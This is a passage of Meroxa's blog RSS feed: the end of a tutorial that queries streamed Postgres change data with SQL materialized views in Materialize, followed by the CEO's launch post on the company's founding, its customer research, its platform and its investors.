&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;op&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; op&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;payload&apos;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;ts_ms&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;bigint&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; ts_ms&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;val&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;schema&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;::&lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;schema&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;text&lt;/span&gt;::jsonb &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; val &lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; user_cdc_stream&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*Bjj-aBvZkZL5UfucgChjeQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Now, we can act on this view as if it was a SQL table. Let’s say we wanted to see the counts of the different types of operations (inserts, updates, and deletes) occurring to Postgres. We can use the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; op&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;COUNT&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; user_cdc_table &lt;span class=&quot;token keyword&quot;&gt;GROUP&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;BY&lt;/span&gt; op&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*-92MwfgURvG61G0IEVbVJw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The nice thing is that because materialized views are compostable, we can create another materialized view from queries of&lt;em&gt;other&lt;/em&gt; materialized views:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; MATERIALIZED &lt;span class=&quot;token keyword&quot;&gt;VIEW&lt;/span&gt; op_counts &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; op&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;COUNT&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; user_cdc_table &lt;span class=&quot;token keyword&quot;&gt;GROUP&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;BY&lt;/span&gt; op&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As our queries become more complex and datasets grow, we can continue to create more and more views. They will all be lighting fast and updated in real-time. A great demo to see this timing in action is the&lt;a href=&quot;https://materialize.com/docs/katacoda/?intro-wikipedia&quot;&gt;Materialize Demo&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Using&lt;code class=&quot;language-text&quot;&gt;watch&lt;/code&gt;, we can see execute a query in&lt;code class=&quot;language-text&quot;&gt;psql&lt;/code&gt; once per second continuously:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*p0DcOgfBk__f2OfBDyJWBw.gif&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;watch&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-n1&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;psql -U materialize -h localhost -p 6875 materialize -c &quot;SELECT * FROM op_counts;&quot;&apos;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;What’s Next?&lt;/h3&gt;
&lt;p&gt;Now that you’ve built a pipeline to stream data from Meroxa to Materialize, you can continue to build your real-time streaming analytics stack. Here are a couple of other things you can do:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Building more views:&lt;a href=&quot;https://materialize.com/docs/overview/what-is-materialize/#sql--views&quot;&gt;materialized views&lt;/a&gt; can be used to transform or even duplicate sources into Materialize.&lt;/li&gt;
&lt;li&gt;Adding additional sources:&lt;a href=&quot;https://docs.meroxa.com/docs/resource-types&quot;&gt;check out other sources&lt;/a&gt; in Meroxa (e.g., ElasticSearch). All can be streamed to Materialize using the same steps above.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I can’t wait to see what you build 🚀.&lt;/p&gt;
&lt;p&gt;For more information, check out:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://materialize.com/docs/katacoda/?intro-wikipedia&quot;&gt;Materialize Demo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/getting-started/setup&quot;&gt;Get Started with Meroxa&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Hello World, Meroxa Style.]]></title><description><![CDATA[“Data is the new oil.” If data is the new oil, we wanted to power the refinery. The merox process, but for data.]]></description><link>https://meroxa.com/blog/hello-world-meroxa-style</link><guid isPermaLink="false">https://meroxa.com/blog/hello-world-meroxa-style</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Tue, 13 Apr 2021 19:49:00 GMT</pubDate><content:encoded>&lt;p&gt;In early 2019, I was watching a documentary about the Dangote refinery being built in Nigeria. The narrator was describing the refining process for jet fuel and mentioned something like“… and this is where the merox process kicks off, ensuring the jet fuel is free from impurities.”&lt;/p&gt;
&lt;p&gt;A light bulb went off.&lt;/p&gt;
&lt;p&gt;I spent years at Heroku and frequently heard Marc Benioff say, “Data is the new oil.” If data is the new oil, we wanted to power the refinery. The merox process, but for data.&lt;/p&gt;
&lt;p&gt;I met my cofounder Ali Hamidi at Heroku where we both worked on the world’s best platform as a service. I remember the exact moment we realized we were kindred spirits on the same quest and of course it starts with Hacker News. After discussing the technical merits of yet another “revolutionary technology”, I remember us joking about how the data ecosystem was the wild west of well-marketed products that were just repackaged incremental improvements. For some reason this time my snarkiness sparked a different twinkle in Ali’s eye. “Well maybe we should do something about it”. Yes Ali. We should.&lt;/p&gt;
&lt;p&gt;Ali and I grabbed a conference room at a coworking space. We discussed what was missing from the data ecosystem that could help data professionals be more productive. A couple hours later, we had a reference architecture for the initial platform offering. As we sat back and looked at all the scribbles on that whiteboard, I remember our collective excitement about the future and thinking, “now the real work begins.”&lt;/p&gt;
&lt;p&gt;Meroxa was born.&lt;/p&gt;
&lt;p&gt;With a little bit of pre-seed cash in the bank, we needed to talk to potential customers and clarify our ideal customer profile. Is what we were building a necessity or a nice to have? Before starting an accelerator program, I spent the next three months interviewing over one hundred people including data engineers, data analysts, data scientists, and software engineers. It was crucial to understand the bottlenecks to their productivity. We asked them questions about the tools they used, what they liked or didn’t like about their current toolset, their workflow, and how they spent their time-solving data issues for stakeholders. What we found was pretty shocking:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;65% of their time spent was on grunt work (data cleaning, integrating data components, maintaining pipelines) and 30% of their time spent was on ad hoc requests from stakeholders, leaving 5% for feature support.&lt;/li&gt;
&lt;li&gt;The average time to bring a data pipeline to production was between 3–6 months, despite most companies having dedicated data engineers on staff.&lt;/li&gt;
&lt;li&gt;They were armed to the teeth with different tools for different processes, which only complicated their jobs instead of making it easier.&lt;/li&gt;
&lt;li&gt;Most of the companies they worked for were making decisions based on data that was stale or inaccurate.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By delivering on the promise of a self-service platform that would reduce the amount of grunt work, we could unlock new levels of productivity and a whole new class of customer experiences powered by real-time data in minutes not months.&lt;/p&gt;
&lt;p&gt;Our belief at Meroxa is that anyone can be a data engineer if given the right toolset. In our customer research, it wasn’t uncommon to see engineers deploying 4+ commercial tools and a healthy heaping of open-source offerings environment to orchestrate data. Each of those tools/services have their own configuration profiles and operational complexities requiring the engineers to have deep&lt;em&gt;and&lt;/em&gt; broad knowledge. As you can imagine, maintenance is a nightmare anytime something goes wrong. Regardless of industry vertical or company size, the people we interviewed all had the same issues:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Maintaining real-time infrastructure using open source Kafka was a chore and the managed services are expensive.&lt;/li&gt;
&lt;li&gt;Commercial ELT and CDP solutions are rigid and don’t handle upstream schema changes well.&lt;/li&gt;
&lt;li&gt;Additional instrumentation was needed in their data infrastructure for observability, scaling, and incident triage&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And each of the problems were centered around the same set of use cases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Desire to do real-time data warehouse sync for analytics and dashboard visualizations.&lt;/li&gt;
&lt;li&gt;Archival of raw records into a data lake for model training/active learning.&lt;/li&gt;
&lt;li&gt;Processing data in real-time to ensure it reaches the destination in the proper format without introducing latency or complexity with external tools&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With that knowledge, we built the Meroxa platform to help engineers control the fragmented data-services ecosystem and evolve the conversation from integration to orchestration.&lt;/p&gt;
&lt;p&gt;The platform consists of a change data capture service, schema registry, event streaming service, API proxy, and incident-automation framework that allows customers to transform and orchestrate data in real-time to multiple destinations. This is achieved without modifying application code or introducing performance overhead to your production data sources. Customers who previously spent millions of dollars building real-time data infrastructure over multiple years, now have the ability to build production-ready pipelines in minutes using our CLI and dashboard.&lt;/p&gt;
&lt;p&gt;After months of design partnerships, pilots, proof of concepts, demos, and a closed developer preview, we are finally ready to unveil our self-service platform to the world. While we’ve put in a ton of hours, this moment would not be possible without the support of our incredible investors including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Nick Caldwell, Village Global, Adam Gross, Jason Warner, Deon Nicholas, Hustle Fund, and Fredrik Bjork who believed in us when we were just a deck and a dream.&lt;/li&gt;
&lt;li&gt;Root Ventures (Lee Edwards) &amp;#x26; Amplify Partners (Sarah Catanzaro &amp;#x26; Lenny Pruss) who co-led our seed round.&lt;/li&gt;
&lt;li&gt;Drive Capital (Andy Jenks &amp;#x26; Van Jones) who led our Series A.&lt;/li&gt;
&lt;li&gt;And a host of other strategic angels, institutional investors, and scouts including Menlo, Index, Kleiner, Addition, Sequoia, Meritech, Calvin French-Owen, Chris Riccomini, Kelvin Beachum, Tokyo Black (Looker co-founders), and more…&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Having raised $19.2M between our Seed and Series A, we’ve assembled one of the best teams to deliver a best-in-class platform and developer experience for our customers.&lt;/p&gt;
&lt;p&gt;Today Meroxa takes off.&lt;/p&gt;
&lt;p&gt;If you’re excited, we invite you to sign up and get access to our platform at&lt;a href=&quot;https://meroxa.com/&quot;&gt;meroxa.com&lt;/a&gt;. No sales calls or solution architects needed. Just plain old productivity in minutes. We’re excited to see what you build next.&lt;/p&gt;
&lt;p&gt;DeVaris Brown&lt;br&gt;
CEO, Meroxa&lt;/p&gt;</content:encoded></item></channel></rss>